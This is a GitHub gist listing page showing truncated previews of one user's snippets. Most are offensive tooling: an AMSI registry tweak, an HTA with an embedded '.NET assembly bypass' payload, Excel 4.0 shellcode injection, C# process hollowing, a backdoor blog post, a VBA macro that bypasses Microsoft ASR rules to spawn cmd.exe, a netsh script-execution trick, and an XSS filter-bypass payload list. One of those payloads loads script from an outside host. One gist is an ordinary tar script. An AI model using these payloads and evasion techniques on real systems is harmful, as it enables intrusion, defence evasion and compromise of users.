Skip to content

Instantly share code, notes, and snippets.

@cparmn
cparmn / AMSI-Authenticode.ps1
Created March 20, 2023 17:13
AMSI Provider Information
function AMSI-Authenticode {
param (
[Parameter(Mandatory=$false)]
[switch]$EnableAuthenticodeSigning,
[switch]$DisableAuthenticodeSigning
)
if ($EnableAuthenticodeSigning) {
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\AMSI" -Name "FeatureBits" -Value 0x2 -Type DWord
@cparmn
cparmn / google-dorks
Created May 28, 2019 17:02 — forked from stevenswafford/google-dorks
Listing of a number of useful Google dorks.
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked!
@cparmn
cparmn / honeybadger.hta
Created May 23, 2019 18:27
HoneyBadger PNG - .NET Assembly Bypass
<html>
<img id="HoneyBadger" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABAAAAAKtCAIAAAA2LYveAAAACXBIWXMAAA7zAAAO8wEcU5k6AAAAEXRFWHRUaXRsZQBQREYgQ3JlYXRvckFevCgAAAATdEVYdEF1dGhvcgBQREYgVG9vbHMgQUcbz3cwAAAALXpUWHREZXNjcmlwdGlvbgAACJnLKCkpsNLXLy8v1ytISdMtyc/PKdZLzs8FAG6fCPGXryy4AAovrklEQVR42ty9i5bjSJIsFgGAZGZWVnX1vFa60tmj/z/6CR19ymp1R3dmerrrkZl8ACFztwiH40kwM6tnJW5PLZMEgXghYO5ubh7/z//jfw8hxOELn1RVFeZedZBvU0r2iX8/ffFs09fSr6qY1o+fXLqz9/yK/3ZdZ+8H/3Yn+9NeK5eIYTfbWfbLfm7dvHQt39tI2ldx8uL5l8Z/cFg5Cfu1MBRz81Kt9W7uPNG3x/d0dl7asDb76/M4bfP0yLbM49Jho3a2C+ttaR0uvTDO/if9RLcd3nT6Gk3c7Hl27vM4eT9dnzzlaApWzhAXzs8/67qu9GVfHbt73Nl1HSv8l7q2O3btpW3P6A5WirShi2WkZQdomtPsDdK27agB/PZY53VbxUav3OjVK/7ZNHv8o8s+H3Zpa54BDcA5bXnjYH9z8b1OyvPlcsF7fti2id3UraPe6atpGn6FI4/P3/EnD8D5tUfywq9affFU1oUmHvNC0hdbUsurmV9XOhQ8Unpdc6m0bD+6Jf/Grp/xC4elYpfxwsHlXN1wPejnqSlLBWfBDFW4QVOsOu7DEbPI3kXsPDjb8dxyQPDv+Xw+nS7YsXe7g05nbJrdfr9v6n3u/uXy9PKNS/3u7u5wOKCvGDR88/z8HEOtUyYvncQaDau6c3kSVFxdsmGkqk3dk77w+ePj44cPH5qd7JzpdNQ+5hfOjFbhX1xOxrSRUcUnuNzxeMSlcSg+5ySi
<#
Lateral movement and shellcode injection via Excel 4.0 macros
Author: Philip Tsukerman (@PhilipTsukerman)
License: BSD 3-Clause
Based on Invoke-Excel4DCOM by Stan Hegt (@StanHacked) / Outflank - https://github.com/outflanknl/Excel4-DCOM
#>
function Invoke-ExShellcode
{
<#
@cparmn
cparmn / Hollowing.cs
Created May 15, 2019 19:28 — forked from smgorelik/Hollowing.cs
Simple Process Hollowing C#
/***************
* Simple Process Hollowing in C#
*
* #Build Your Binaries
* c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe
*
* @author: Michael Gorelik <smgorelik@gmail.com>
* gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75
* #Most of the code taken from here: @github: github.com/ambray
@cparmn
cparmn / blog.txt
Created April 16, 2019 15:31
Gist Blog - Inside Out, Simple backdoors
From the inside out, a minimalist backdoor.
I'm a pretty big fan of simple, and elegant. In this gist blog, I'll show you a very simple way to maintain access to a remote system that is behind a FireWall, NAT and VPN.
We will use in this example 3 tools.
1. Node
2. PowerShell
3. LocalTunnel
While I have a full compact, custom version, I will not release this.
@cparmn
cparmn / ASR Rules Bypass.vba
Created January 17, 2019 19:57 — forked from infosecn1nja/ASR Rules Bypass.vba
ASR rules bypass creating child processes
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
@cparmn
cparmn / Script-Execution
Last active April 30, 2021 13:07
Allows the Execution of Scripts
```powershell
write-host "This will run`r`nThis is still on line one Now lets run the ps Command"
ps | where-object {$_.ProcessName -eq "cmd"}
write-host "Finally on line 3`r`n ...stilll line 3..."
ipconfig
write-host "Now we're on the final line "
```powershel
netsh -f script1.ps1 | % {[regex]::matches($_ ,'(?<=The following command was not found: )(.*?)(?=\.$)')} | % { $_.value -replace "" } | powers
@cparmn
cparmn / FolderTar.sh
Created May 22, 2018 16:19
Tallball each folder independently from the currently working directory
#!/bin/bash
#Casey Parman 5/22/18
#This will archive all directories in the current working directory.
# I'm sure theres a more elegant way to do this
for i in $(ls -d */);
do
NAME=$(echo $i | sed 's/\///') #this Removes the tailing forward slash from the variable $i
tar -czvf $NAME.tar.gz $i >/dev/null 2>&1
tar -dvf $NAME.tar.gz > /dev/null 2>&1
if [ $? -eq 1 ]
@cparmn
cparmn / xxsfilterbypass.lst
Created March 26, 2018 03:24 — forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>